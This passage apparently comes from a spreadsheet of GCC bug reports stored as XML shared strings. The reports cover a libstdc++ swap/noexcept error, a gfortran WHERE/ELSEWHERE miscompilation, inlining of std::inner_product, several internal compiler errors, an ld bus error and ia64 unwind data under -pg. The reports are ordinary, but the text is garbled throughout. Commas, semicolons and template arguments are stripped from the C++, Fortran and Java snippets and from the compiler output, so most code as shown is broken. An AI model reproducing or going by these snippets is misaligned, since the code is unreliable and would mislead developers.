/usr/local/gcc-head/include/c++/6.0.0/type_traits:2594:27:   required from 'typename std::enable_if::value&gt;::type std::swap(_Tp ( long unsigned int _Nm = 1ul typename std::enable_if::value&gt;::type = void]'
prog.cc:8:17:   required from here
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: error: no type named 'type' in 'struct std::enable_if'
In file included from /usr/local/gcc-head/include/c++/6.0.0/bits/move.h:57:0
                 from /usr/local/gcc-head/include/c++/6.0.0/bits/stl_pair.h:59
                 from /usr/local/gcc-head/include/c++/6.0.0/utility:70
                 from prog.cc:1:
/usr/local/gcc-head/include/c++/6.0.0/type_traits: In instantiation of 'typename std::enable_if::value&gt;::type std::swap(_Tp ( long unsigned int _Nm = 1ul typename std::enable_if::value&gt;::type = void]':
prog.cc:8:17:   required from here
/usr/local/gcc-head/include/c++/6.0.0/type_traits:2594:27: error: no matching function for call to 'swap(int [2] int [2])'
     noexcept(noexcept(swap(*__a *__b)))
                       ~~~~^~~~~~~~~~~~
In file included from /usr/local/gcc-head/include/c++/6.0.0/bits/stl_pair.h:59:0
                 from /usr/local/gcc-head/include/c++/6.0.0/utility:70
                 from prog.cc:1:
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: note: candidate: template typename std::enable_if std::is_move_assignable &gt;::value&gt;::type std::swap(_Tp&amp; _Tp&amp;)
     swap(_Tp&amp; __a _Tp&amp; __b)
     ^~~~
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: note:   template argument deduction/substitution failed:
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h: In substitution of 'template typename std::enable_if std::is_move_assignable &gt;::value&gt;::type std::swap(_Tp&amp; _Tp&amp;) [with _Tp = int [2]]':
/usr/local/gcc-head/include/c++/6.0.0/type_traits:2594:27:   required from 'typename std::enable_if::value&gt;::type std::swap(_Tp ( long unsigned int _Nm = 1ul typename std::enable_if::value&gt;::type = void]'
prog.cc:8:17:   required from here
/usr/local/gcc-head/include/c++/6.0.0/bits/move.h:179:5: error: no type named 'type' in 'struct std::enable_if'
It seems to me that gcc's extension usage of a constrained swap declaration (which is generally an improvement over what the standard specifies) interacts nastily with the currently required (but obviously defect see issue above) exception-specification by the Standard Library. The effect of the expression-form swap(*__a *__b) used in the function declaration
template
    inline
    typename enable_if::value&gt;::type
    swap(_Tp (&amp;__a)[_Nm] _Tp (&amp;__b)[_Nm])
    noexcept(noexcept(swap(*__a *__b)))
is that lookup cannot yet see the just being declared swap overload for arrays (because the declaration is not completed within the noexcept declaration) therefore the expression
swap(*__a *__b)
is effectively evaluated in the context of the previously declared non-array overload:
template
    inline
    typename enable_if
			      is_move_assignable&gt;::value&gt;::type
    swap(_Tp&amp; _Tp&amp;)
    noexcept(__and_
	            is_nothrow_move_assignable&gt;::value)
But this form is constrained in regard to is_move_constructible and is_move_assignable none of which can evaluate to true for arrays. 
A possible fix would be to (a) remove the swap constraints (which presumably has other unwanted effects) or (b) replace the required noexcept expression noexcept(swap(*__a *__b)) of the array form by __is_nothrow_swappable::value as suggested in the paper
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2015/n4511.html
Being the author of that paper I'm interested to add a more complete __is_[nothrow_]swappable to libstdc++ that would also work for this example. So feel free to assign me to this bug.</t>
  </si>
  <si>
    <t>GCC-35759</t>
  </si>
  <si>
    <t>WHERE with overlap with ELSEWHERE error</t>
  </si>
  <si>
    <t>The following program computes the wrong result for a WHERE where
different sections of the same array are in both the WHERE and
ELSEWHERE section.  It's as if the ELSEWHERE block were
ignored.
Dick Hendrickson
      program RG0023
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      integer UDA1L(6)
      integer ::  UDA1R(6) expected(6) = (/205030/)
      LOGICAL LDA(5)
      UDA1L(1:6) = 0
      uda1r = (/123456/)
      lda = (/ (i/2*2 .ne. I i=15) /)
      WHERE (LDA)                !          expected
        UDA1L(1:5) = UDA1R(2:6)  !  uda1l = 204060
      ELSEWHERE
        UDA1L(2:6) = UDA1R(6:2:-1) !uda1l = 205030
      ENDWHERE
      print * 'expected = 'expected
      print * 'computed = ' uda1l
      END
gfortran:gfortran rg0023.f
gfortran:a
 expected =            2           0           5           0           3       0
 computed =            2           0           4           0           6       0</t>
  </si>
  <si>
    <t>GCC-33293</t>
  </si>
  <si>
    <t>inlining std::inner_product()</t>
  </si>
  <si>
    <t>I use std::inner_product() to do the vector multiplication when performing matrix multiplication.  This involves calling std::inner_product() within 2 nested loops (one across all rows one across all columns).  Unfortunately g++-4.1.2 will not it seems inline the call even at -O5.  If I provide my own version with an inline hint it improves the speed of my matrix multiplication by ~15% which is not to be sniffed at.
I suppose my questions would be:
(a) erm do you need proof?
(b) should the compiler do the inlining regardless (ie it's a compiler issue) or should the declaration of std::inner_product give a hint with the inline keyword (and perhaps also other functions)?
Simon.</t>
  </si>
  <si>
    <t>GCC-19869</t>
  </si>
  <si>
    <t>[3.3 Regression] Allow to non-friend class to get access to function pointer</t>
  </si>
  <si>
    <t>Reading specs from /opt/gcc-3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3.6/specs
Configured with: ../configure --prefix=/opt/gcc-3.3 --enable-languages=cc++
Thread model: posix
gcc version 3.3.6 20050209 (prerelease)
The following compiles without errors on a vanilla build of gcc 3.3.5 and gcc
3.3.6. The 3.4 and 4.0 builds both correctly give an error while compiling this.
typedef void (*MyCall)(int j)
class P
{
private:
        MyCall  myCall
}
class J
{
public:
        J(P* p) { p-&gt;myCall(5) }
}</t>
  </si>
  <si>
    <t>GCC-26622</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in extract_insn at recog.c:2084</t>
  </si>
  <si>
    <t>Test case is huge (26KLOC) but only takes a fraction of a second to compile and die.
Just compile with
       g++ -c ice.i
I'll append the test case momentarily</t>
  </si>
  <si>
    <t>GCC-61890</t>
  </si>
  <si>
    <t>[5 Regression] g++.dg/ipa/devirt-23.C FAILs with -O2 -fno-devirtualize-speculatively -fno-guess-branch-probability</t>
  </si>
  <si>
    <t>Created attachment 33178
preprocessed source (g++.dg/ipa/devirt-23.C)
Output:
$ g++ -O2 -fno-devirtualize-speculatively -fno-guess-branch-probability devirt-23.ii
$ ./a.out 
Aborted
Tested revisions:
trunk r212932 - FAIL
4_9 r212703 - OK</t>
  </si>
  <si>
    <t>GCC-36057</t>
  </si>
  <si>
    <t>[4.4 Regression] struct-layout-1_generate.c  uses non-ISO C  '%n$'  operand number formats</t>
  </si>
  <si>
    <t>This commit 
2008-02-20  Uros Bizjak  
	* g++.dg/compat/struct-layout-1_generate.c (DG_OPTIONS): New define.
	(switchfiles): Use DG_OPTIONS. Explicitly name arguments in fprintf
	templates to reduce number of passed arguments.
breaks the G++  struct-layout tests on MS Windows since the host printf family does not support the '%n$' extension.  The dg-options in generated files 
look like 
 /* { dg-options -w $s -I$s } */
After reverting that patch all 150 tescase succeed.</t>
  </si>
  <si>
    <t>GCC-349</t>
  </si>
  <si>
    <t>dynamic cast bug.</t>
  </si>
  <si>
    <t>dynamic_cast with during a constructor when the base class
uses virtual inheritance and a derived class uses multiple inheritance
yields an incorrect result.
Description: 
This bug was reported as a segfualt in the gtk-- C++ library. 
Further tracing lead us to believe that the error was in fact
a function of the compiler.
With certain class structures it is possible for dynamic_cast to
return an incorrect pointer during the constructor.  The bug does
not occur on any non-gcc compilers but has been verified to exist
up to 2.95.3.   Static cast does not display that behavior.
Following construction casting works as expected.  Likely this is a 
bug in the vtable.  
The requirements for causing the bug to appear are lengthy.  There
must be a virtual inheritence earlier in the base classes and a 
derived class must have multiple inheritence.  A cast must happen
to one of the base classes which then is dynamic cast back up to
another base class.  Since this cast is to a fully constructed 
base class this should work properly. 
Example program:
The code below demostrates the error.  The proper output is 
to print the same pointer location 9 times.  However on 
gcc the code produces
0x804a830 0x804a830 0x804a838
0x804a830 0x804a830 0x804a830
0x804a830 0x804a830 0x804a830
Thus one can see that a dynamic cast from a proper base class
resulted in an incorrect pointer.  The error only occurs during
construction of B0.  Gtk-- unforunately execises this bug 
on many programs. 
O1-5 represent structures defined in the shared library gtk--.
B0-1 combine them to expose the bug.
Release:
2.95.2
Environment:
all (Sun HP-UX Irix i86 tested)
How-To-Repeat:
#include 
struct O1 { int i0_ virtual ~O1() {} }
struct O2 : virtual public O1 { int i1_ virtual ~O2() {} }
struct O3 : public O2 { int i2_ O3() {} virtual ~O3() {} }
struct O4 : public O3 { int i4_ }
struct O5 { int i5_ O5(){} }
class B0 : public O4
{
public:
  B0()
    {
     foo()
    }
  void foo()
    {
     cout
      &lt;&lt; this &lt;&lt;  
      (this) &lt;&lt;  
      (static_cast(this)) &lt;&lt; endl
    }
  int i6_
}
class B1 : public B0 public O5
{
public:
  B1() { }
  int i7_
}
int main()
{
  B1 *p = new B1
  B0 *b= p
  cout
    &lt;&lt; p &lt;&lt;  
    (p) &lt;&lt;  
    (static_cast(p)) &lt;&lt; endl
  b-&gt;foo()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-23196</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE instantiate_virtual_regs_in_insn when -fforce-addr used</t>
  </si>
  <si>
    <t># gcc -v
Using built-in specs.
Target: x86_64-pc-linux-gnu
Configured with:
/var/tmp/portage/gcc-4.1.0_beta20050730/work/gcc-4.1-20050730/configure
--enable-version-specific-runtime-libs --prefix=/usr
--bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.1.0-beta20050730
--includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.1.0-beta20050730/include
--datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.0-beta20050730
--mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.0-beta20050730/man
--infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.1.0-beta20050730/info
--with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.1.0-beta20050730/include/g++-v4
--host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec
--enable-nls --without-included-gettext --with-system-zlib --disable-checking
--disable-werror --disable-libunwind-exceptions --enable-multilib
--disable-libgcj --enable-languages=cc++f95 --enable-shared
--enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 4.1.0 20050730 (experimental)
 # gcc -march=athlon64 -O1 -fforce-addr    -c /tmp/j1.c
rlogin.c: In function 'do_rlogin':
rlogin.c:181: error: unrecognizable insn:
(insn 116 187 118 13 (parallel [
            (set (mem/s/j:SI (reg/f:DI 102) [0 termio.c_iflag+0 S4 A64])
                (ior:SI (mem/s/j:SI (reg/f:DI 103) [0 termio.c_iflag+0 S4 A64])
                    (const_int 1280 [0x500])))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
rlogin.c:181: internal compiler error: in instantiate_virtual_regs_in_insn at
function.c:1539
j1.c will be attached.  (It's a preprocessed rlogin.c from the shadow package)</t>
  </si>
  <si>
    <t>GCC-25132</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] collect2: ld terminated with signal 10 [Bus error] core dumped</t>
  </si>
  <si>
    <t>/test/gnu/gcc-3.3/objdir/./gcc/xgcc -B/test/gnu/gcc-3.3/objdir/./gcc/ -B/opt/gnu
/gcc/gcc-4.1.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.1.0/hppa2.0w-hp-h
pux11.11/lib/ -isystem /opt/gnu/gcc/gcc-4.1.0/hppa2.0w-hp-hpux11.11/include -isy
stem /opt/gnu/gcc/gcc-4.1.0/hppa2.0w-hp-hpux11.11/sys-include -shared -fPIC -Wl
+h -Wllibgfortran.sl.1 -Wl+b -Wl/opt/gnu/gcc/gcc-4.1.0/lib -o .libs/libgfortr
an.sl.1.0  .libs/compile_options.o .libs/environ.o .libs/error.o .libs/fpu.o .li
bs/main.o .libs/memory.o .libs/pause.o .libs/stop.o .libs/string.o .libs/select.
o .libs/all_l4.o .libs/all_l8.o .libs/all_l16.o .libs/any_l4.o .libs/any_l8.o .l
ibs/any_l16.o .libs/count_4_l4.o .libs/count_8_l4.o .libs/count_16_l4.o .libs/co
unt_4_l8.o .libs/count_8_l8.o .libs/count_16_l8.o .libs/count_4_l16.o .libs/coun
t_8_l16.o .libs/count_16_l16.o .libs/maxloc0_4_i4.o .libs/maxloc0_8_i4.o .libs/m
axloc0_16_i4.o .libs/maxloc0_4_i8.o .libs/maxloc0_8_i8.o .libs/maxloc0_16_i8.o .
libs/maxloc0_4_i16.o .libs/maxloc0_8_i16.o .libs/maxloc0_16_i16.o .libs/maxloc0_
4_r4.o .libs/maxloc0_8_r4.o .libs/maxloc0_16_r4.o .libs/maxloc0_4_r8.o .libs/max
loc0_8_r8.o .libs/maxloc0_16_r8.o .libs/maxloc0_4_r10.o .libs/maxloc0_8_r10.o .l
ibs/maxloc0_16_r10.o .libs/maxloc0_4_r16.o .libs/maxloc0_8_r16.o .libs/maxloc0_1
6_r16.o .libs/maxloc1_4_i4.o .libs/maxloc1_8_i4.o .libs/maxloc1_16_i4.o .libs/ma
xloc1_4_i8.o .libs/maxloc1_8_i8.o .libs/maxloc1_16_i8.o .libs/maxloc1_4_i16.o .l
ibs/maxloc1_8_i16.o .libs/maxloc1_16_i16.o .libs/maxloc1_4_r4.o .libs/maxloc1_8_
r4.o .libs/maxloc1_16_r4.o .libs/maxloc1_4_r8.o .libs/maxloc1_8_r8.o .libs/maxlo
c1_16_r8.o .libs/maxloc1_4_r10.o .libs/maxloc1_8_r10.o .libs/maxloc1_16_r10.o .l
ibs/maxloc1_4_r16.o .libs/maxloc1_8_r16.o .libs/maxloc1_16_r16.o .libs/maxval_i4
.o .libs/maxval_i8.o .libs/maxval_i16.o .libs/maxval_r4.o .libs/maxval_r8.o .lib
s/maxval_r10.o .libs/maxval_r16.o .libs/minloc0_4_i4.o .libs/minloc0_8_i4.o .lib
s/minloc0_16_i4.o .libs/minloc0_4_i8.o .libs/minloc0_8_i8.o .libs/minloc0_16_i8.
o .libs/minloc0_4_i16.o .libs/minloc0_8_i16.o .libs/minloc0_16_i16.o .libs/minlo
c0_4_r4.o .libs/minloc0_8_r4.o .libs/minloc0_16_r4.o .libs/minloc0_4_r8.o .libs/
minloc0_8_r8.o .libs/minloc0_16_r8.o .libs/minloc0_4_r10.o .libs/minloc0_8_r10.o
 .libs/minloc0_16_r10.o .libs/minloc0_4_r16.o .libs/minloc0_8_r16.o .libs/minloc
0_16_r16.o .libs/minloc1_4_i4.o .libs/minloc1_8_i4.o .libs/minloc1_16_i4.o .libs
/minloc1_4_i8.o .libs/minloc1_8_i8.o .libs/minloc1_16_i8.o .libs/minloc1_4_i16.o
 .libs/minloc1_8_i16.o .libs/minloc1_16_i16.o .libs/minloc1_4_r4.o .libs/minloc1
_8_r4.o .libs/minloc1_16_r4.o .libs/minloc1_4_r8.o .libs/minloc1_8_r8.o .libs/mi
nloc1_16_r8.o .libs/minloc1_4_r10.o .libs/minloc1_8_r10.o .libs/minloc1_16_r10.o
 .libs/minloc1_4_r16.o .libs/minloc1_8_r16.o .libs/minloc1_16_r16.o .libs/minval
_i4.o .libs/minval_i8.o .libs/minval_i16.o .libs/minval_r4.o .libs/minval_r8.o .
libs/minval_r10.o .libs/minval_r16.o .libs/product_i4.o .libs/product_i8.o .libs
/product_i16.o .libs/product_r4.o .libs/product_r8.o .libs/product_r10.o .libs/p
roduct_r16.o .libs/product_c4.o .libs/product_c8.o .libs/product_c10.o .libs/pro
duct_c16.o .libs/sum_i4.o .libs/sum_i8.o .libs/sum_i16.o .libs/sum_r4.o .libs/su
m_r8.o .libs/sum_r10.o .libs/sum_r16.o .libs/sum_c4.o .libs/sum_c8.o .libs/sum_c
10.o .libs/sum_c16.o .libs/dotprod_i4.o .libs/dotprod_i8.o .libs/dotprod_i16.o .
libs/dotprod_r4.o .libs/dotprod_r8.o .libs/dotprod_r10.o .libs/dotprod_r16.o .li
bs/dotprod_l4.o .libs/dotprod_l8.o .libs/dotprod_l16.o .libs/dotprod_c4.o .libs/
dotprod_c8.o .libs/dotprod_c10.o .libs/dotprod_c16.o .libs/matmul_i4.o .libs/mat
mul_i8.o .libs/matmul_i16.o .libs/matmul_r4.o .libs/matmul_r8.o .libs/matmul_r10
.o .libs/matmul_r16.o .libs/matmul_c4.o .libs/matmul_c8.o .libs/matmul_c10.o .li
bs/matmul_c16.o .libs/matmul_l4.o .libs/matmul_l8.o .libs/matmul_l16.o .libs/tra
nspose_i4.o .libs/transpose_i8.o .libs/transpose_i16.o .libs/transpose_c4.o .lib
s/transpose_c8.o .libs/transpose_c10.o .libs/transpose_c16.o .libs/shape_i4.o .l
ibs/shape_i8.o .libs/shape_i16.o .libs/eoshift1_4.o .libs/eoshift1_8.o .libs/eos
hift1_16.o .libs/eoshift3_4.o .libs/eoshift3_8.o .libs/eoshift3_16.o .libs/cshif
t1_4.o .libs/cshift1_8.o .libs/cshift1_16.o .libs/reshape_i4.o .libs/reshape_i8.
o .libs/reshape_i16.o .libs/reshape_c4.o .libs/reshape_c8.o .libs/reshape_c10.o
.libs/reshape_c16.o .libs/in_pack_i4.o .libs/in_pack_i8.o .libs/in_pack_i16.o .l
ibs/in_pack_c4.o .libs/in_pack_c8.o .libs/in_pack_c10.o .libs/in_pack_c16.o .lib
s/in_unpack_i4.o .libs/in_unpack_i8.o .libs/in_unpack_i16.o .libs/in_unpack_c4.o
 .libs/in_unpack_c8.o .libs/in_unpack_c10.o .libs/in_unpack_c16.o .libs/exponent
_r4.o .libs/exponent_r8.o .libs/exponent_r10.o .libs/exponent_r16.o .libs/fracti
on_r4.o .libs/fraction_r8.o .libs/fraction_r10.o .libs/fraction_r16.o .libs/near
est_r4.o .libs/nearest_r8.o .libs/nearest_r10.o .libs/nearest_r16.o .libs/set_ex
ponent_r4.o .libs/set_exponent_r8.o .libs/set_exponent_r10.o .libs/set_exponent_
r16.o .libs/pow_i4_i4.o .libs/pow_i8_i4.o .libs/pow_i16_i4.o .libs/pow_r4_i4.o .
libs/pow_r8_i4.o .libs/pow_r10_i4.o .libs/pow_r16_i4.o .libs/pow_c4_i4.o .libs/p
ow_c8_i4.o .libs/pow_c10_i4.o .libs/pow_c16_i4.o .libs/pow_i4_i8.o .libs/pow_i8_
i8.o .libs/pow_i16_i8.o .libs/pow_r4_i8.o .libs/pow_r8_i8.o .libs/pow_r10_i8.o .
libs/pow_r16_i8.o .libs/pow_c4_i8.o .libs/pow_c8_i8.o .libs/pow_c10_i8.o .libs/p
ow_c16_i8.o .libs/pow_i4_i16.o .libs/pow_i8_i16.o .libs/pow_i16_i16.o .libs/pow_
r4_i16.o .libs/pow_r8_i16.o .libs/pow_r10_i16.o .libs/pow_r16_i16.o .libs/pow_c4
_i16.o .libs/pow_c8_i16.o .libs/pow_c10_i16.o .libs/pow_c16_i16.o .libs/close.o
.libs/file_pos.o .libs/format.o .libs/inquire.o .libs/list_read.o .libs/lock.o .
libs/open.o .libs/read.o .libs/size_from_kind.o .libs/transfer.o .libs/unit.o .l
ibs/unix.o .libs/write.o .libs/associated.o .libs/abort.o .libs/args.o .libs/bes
sel.o .libs/c99_functions.o .libs/chdir.o .libs/cpu_time.o .libs/cshift0.o .libs
/ctime.o .libs/date_and_time.o .libs/env.o .libs/erf.o .libs/eoshift0.o .libs/eo
shift2.o .libs/etime.o .libs/exit.o .libs/fget.o .libs/flush.o .libs/fnum.o .lib
s/ftell.o .libs/gerror.o .libs/getcwd.o .libs/getlog.o .libs/getXid.o .libs/hype
r.o .libs/hostnm.o .libs/kill.o .libs/ierrno.o .libs/ishftc.o .libs/link.o .libs
/malloc.o .libs/mvbits.o .libs/pack_generic.o .libs/perror.o .libs/signal.o .lib
s/size.o .libs/sleep.o .libs/spread_generic.o .libs/string_intrinsics.o .libs/sy
stem.o .libs/rand.o .libs/random.o .libs/rename.o .libs/reshape_generic.o .libs/
reshape_packed.o .libs/selected_int_kind.o .libs/selected_real_kind.o .libs/stat
.o .libs/symlnk.o .libs/system_clock.o .libs/time.o .libs/transpose_generic.o .l
ibs/tty.o .libs/umask.o .libs/unlink.o .libs/unpack_generic.o .libs/in_pack_gene
ric.o .libs/in_unpack_generic.o .libs/normalize.o .libs/_abs_c4.o .libs/_abs_c8.
o .libs/_abs_c10.o .libs/_abs_c16.o .libs/_abs_i4.o .libs/_abs_i8.o .libs/_abs_i
16.o .libs/_abs_r4.o .libs/_abs_r8.o .libs/_abs_r10.o .libs/_abs_r16.o .libs/_ex
p_r4.o .libs/_exp_r8.o .libs/_exp_r10.o .libs/_exp_r16.o .libs/_exp_c4.o .libs/_
exp_c8.o .libs/_exp_c10.o .libs/_exp_c16.o .libs/_log_r4.o .libs/_log_r8.o .libs
/_log_r10.o .libs/_log_r16.o .libs/_log_c4.o .libs/_log_c8.o .libs/_log_c10.o .l
ibs/_log_c16.o .libs/_log10_r4.o .libs/_log10_r8.o .libs/_log10_r10.o .libs/_log
10_r16.o .libs/_sqrt_r4.o .libs/_sqrt_r8.o .libs/_sqrt_r10.o .libs/_sqrt_r16.o .
libs/_sqrt_c4.o .libs/_sqrt_c8.o .libs/_sqrt_c10.o .libs/_sqrt_c16.o .libs/_asin
_r4.o .libs/_asin_r8.o .libs/_asin_r10.o .libs/_asin_r16.o .libs/_acos_r4.o .lib
s/_acos_r8.o .libs/_acos_r10.o .libs/_acos_r16.o .libs/_atan_r4.o .libs/_atan_r8
.o .libs/_atan_r10.o .libs/_atan_r16.o .libs/_sin_r4.o .libs/_sin_r8.o .libs/_si
n_r10.o .libs/_sin_r16.o .libs/_sin_c4.o .libs/_sin_c8.o .libs/_sin_c10.o .libs/
_sin_c16.o .libs/_cos_r4.o .libs/_cos_r8.o .libs/_cos_r10.o .libs/_cos_r16.o .li
bs/_cos_c4.o .libs/_cos_c8.o .libs/_cos_c10.o .libs/_cos_c16.o .libs/_tan_r4.o .
libs/_tan_r8.o .libs/_tan_r10.o .libs/_tan_r16.o .libs/_sinh_r4.o .libs/_sinh_r8
.o .libs/_sinh_r10.o .libs/_sinh_r16.o .libs/_cosh_r4.o .libs/_cosh_r8.o .libs/_
cosh_r10.o .libs/_cosh_r16.o .libs/_tanh_r4.o .libs/_tanh_r8.o .libs/_tanh_r10.o
 .libs/_tanh_r16.o .libs/_conjg_c4.o .libs/_conjg_c8.o .libs/_conjg_c10.o .libs/
_conjg_c16.o .libs/_aint_r4.o .libs/_aint_r8.o .libs/_aint_r10.o .libs/_aint_r16
.o .libs/_anint_r4.o .libs/_anint_r8.o .libs/_anint_r10.o .libs/_anint_r16.o .li
bs/_sign_i4.o .libs/_sign_i8.o .libs/_sign_i16.o .libs/_sign_r4.o .libs/_sign_r8
.o .libs/_sign_r10.o .libs/_sign_r16.o .libs/_dim_i4.o .libs/_dim_i8.o .libs/_di
m_i16.o .libs/_dim_r4.o .libs/_dim_r8.o .libs/_dim_r10.o .libs/_dim_r16.o .libs/
_atan2_r4.o .libs/_atan2_r8.o .libs/_atan2_r10.o .libs/_atan2_r16.o .libs/_mod_i
4.o .libs/_mod_i8.o .libs/_mod_i16.o .libs/_mod_r4.o .libs/_mod_r8.o .libs/dprod
_r8.o .libs/f2c_specifics.o  -lm -lc
collect2: ld terminated with signal 10 [Bus error] core dumped
make[4]: *** [libgfortran.la] Error 1
This is probably related to PR 24991.  In my experience the most common
reason ld dumps core is when there is a reference to a function that hasn't
been imported.</t>
  </si>
  <si>
    <t>GCC-48579</t>
  </si>
  <si>
    <t>ICE: verify_flow_info: too many outgoing branch edges from bb 3 with asm goto</t>
  </si>
  <si>
    <t>Created attachment 23967
reduced testcase
Compiler output:
$ gcc testcase.c
testcase.c: In function 'foo':
testcase.c:5:3: warning: asm operand 0 probably doesn't match constraints [enabled by default]
testcase.c:5:3: error: impossible constraint in 'asm'
testcase.c:6:1: error: too many outgoing branch edges from bb 3
testcase.c:6:1: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r172314 - crash
4.6 r171597 - crash
4.5 r171597 - crash
4.4 r171597 - doesn't know asm goto</t>
  </si>
  <si>
    <t>GCC-12455</t>
  </si>
  <si>
    <t>Invalid ia64 unwind data when compiling with -pg</t>
  </si>
  <si>
    <t>gcc version 3.4 20030929 (experimental).  Compile hello.c without and with -pg.
-pg adds two bundles to the start of main but the unwind data for main is not
changed.
objdump and readelf -u without -pg
:
        00 08 15 08 80 05       [MII]       alloc r33=ar.pfs540
        20 02 30 00 42 60                   mov r34=r12
        04 08 00 84                         mov r35=r1
        01 00 00 00 01 00       [MII]       nop.m 0x0
        00 02 00 62 00 80                   mov r32=b0
        84 0c 00 90                         addl r36=72r1
        1c 20 01 48 18 10       [MFB]       ld8 r36=[r36]
        00 00 00 02 00 00                   nop.f 0x0
        08 fe ff 58                         br.call.sptk.many 
b0=4000000000000440 
        02 08 00 46 00 21       [MII]       mov r1=r35
        e0 00 00 00 42 00                   mov r14=r0
        01 70 00 84                         mov r8=r14
        00 00 00 00 01 00       [MII]       nop.m 0x0
        00 08 01 55 00 00                   mov.i ar.pfs=r33
        00 0a 00 07                         mov b0=r32
        1d 60 00 44 00 21       [MFB]       mov r12=r34
        00 00 00 02 00 80                   nop.f 0x0
        08 00 84 00                         br.ret.sptk.many b0
: [0x4000000000000620-0x4000000000000680) info at +0x828
  v1 flags=0x0 ( ) len=16 bytes
    R2:prologue_gr(mask=[rpar.pfspsp]grsave=r32rlen=5)
        P7:pfs_when(t=0)
        P7:mem_stack_v(t=1)
        P7:rp_when(t=4)
    R1:body(rlen=13)
        B2:epilogue(t=2ecount=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
objdump and readelf -u with -pg
        02 40 31 10 80 05       [MII]       alloc r40=ar.pfs1280
        b0 42 07 00 48 20                   addl r43=104r1
        05 08 00 84                         mov r41=r1
        11 00 00 00 01 00       [MIB]       nop.m 0x0
        a0 02 00 62 00 00                   mov r42=b0
        38 fd ff 58                         br.call.sptk.many 
b0=40000000000005a0 
        00 08 15 08 80 05       [MII]       alloc r33=ar.pfs540
        20 02 30 00 42 60                   mov r34=r12
        04 08 00 84                         mov r35=r1
        01 00 00 00 01 00       [MII]       nop.m 0x0
        00 02 00 62 00 80                   mov r32=b0
        04 0f 00 90                         addl r36=112r1
        1c 20 01 48 18 10       [MFB]       ld8 r36=[r36]
        00 00 00 02 00 00                   nop.f 0x0
        e8 fc ff 58                         br.call.sptk.many 
b0=4000000000000580 
        02 08 00 46 00 21       [MII]       mov r1=r35
        e0 00 00 00 42 00                   mov r14=r0
        01 70 00 84                         mov r8=r14
        00 00 00 00 01 00       [MII]       nop.m 0x0
        00 08 01 55 00 00                   mov.i ar.pfs=r33
        00 0a 00 07                         mov b0=r32
        1d 60 00 44 00 21       [MFB]       mov r12=r34
        00 00 00 02 00 80                   nop.f 0x0
        08 00 84 00                         br.ret.sptk.many b0
: [0x4000000000000860-0x40000000000008e0) info at +0xb30
  v1 flags=0x0 ( ) len=16 bytes
    R2:prologue_gr(mask=[rpar.pfspsp]grsave=r32rlen=5)
        P7:pfs_when(t=0)
        P7:mem_stack_v(t=1)
        P7:rp_when(t=4)
    R1:body(rlen=13)
        B2:epilogue(t=2ecount=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
    R1:prologue(rlen=0)
Despite the fact that -pg added two bundles to the start of main which changes
the state or ar.pfs and b0 this is not reflected in the unwind data.  Backtrace
from mcount() or an interrupt while executing the -pg prologue will terminate
early.  -pg cannot be used with profiling tools that rely on interrupts.
The body length in the -pg case does not take account of the two extra bundles.
Any error in the last two bundles of the modified body will appear to be outside
the body of the procedure and will use the default unwind data for leaf
functions.  Any error in the last two bundles will get an incorrect backtrace.
My best guess at what the unwind data should look like for the second case it
may be possible to shrink this a bit.  Untested.
: [0x4000000000000860-0x40000000000008e0) info at +0xb30
  v1 flags=0x0 ( ) len=?? bytes
    R1:prologue(rlen=6)
        P3:pfs_gr(reg=r40)
        P7:pfs_when(t=0)
        P3:rp_gr(reg=r42)
        P7:rp_when(t=5)
    R1:body(rlen=0)
        B2:epilogue(t=0ecount=0)
    R2:prologue_gr(mask=[rpar.pfspsp]grsave=r32rlen=5)
        P7:pfs_when(t=0)
        P7:mem_stack_v(t=1)
        P7:rp_when(t=4)
    R1:body(rlen=13)
        B2:epilogue(t=2ecount=0)</t>
  </si>
  <si>
    <t>kaos</t>
  </si>
  <si>
    <t>GCC-19277</t>
  </si>
  <si>
    <t>allows array.length++ although it is final</t>
  </si>
  <si>
    <t>GCC checked out on 2005-01-03 compiles the following code without
complaint using the command line gcj -C -Wall -W -pedantic
ArrayLength.java:
class ArrayLength {
    static int extend(int[] array) {
        /* array.length = 1 */
        array.length++
        return array.length
    }
}
It generates the following bytecode for the method:
  0: aload_0
  1: dup
  2: getfield 
  5: iconst_1
  6: iadd
  7: putfield 
 10: aload_0
 11: arraylength
 12: ireturn
However if I uncomment the first assignment I get this error:
ArrayLength.java: In class 'ArrayLength':
ArrayLength.java: In method 'ArrayLength.extend(int[])':
ArrayLength.java:3: error: Can't reassign a value to the final variable 'length'.
        array.length = 1
  ^
1 error
I think it is inconsistent to allow ++ if the field is final.</t>
  </si>
  <si>
    <t>kon</t>
  </si>
  <si>
    <t>GCC-42754</t>
  </si>
  <si>
    <t>ICE on building libgcc.c __mulvdi3.</t>
  </si>
  <si>
    <t>I got ICE when building m68k-elf on OSX10.6.2. Sources are got via official git repository.
I'll attach the preprocessed sources soon.
- - - -
